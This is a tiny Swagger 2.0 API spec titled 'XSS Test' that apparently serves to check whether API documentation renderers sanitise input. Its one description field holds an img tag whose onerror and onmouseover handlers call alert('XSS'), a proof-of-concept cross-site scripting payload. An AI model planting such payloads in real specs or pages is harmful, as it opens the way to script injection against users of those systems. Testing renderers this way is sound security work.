swagger: '2.0'
info:
  title: XSS Test 
  version: 1.0.0
paths:
  /:
    get:
      summary: XSS testing
      description: |
  <img src="invalid-image" onerror="alert('XSS')" onmouseover="alert('XSS')">


      responses:
        '200':
          description: Successful response
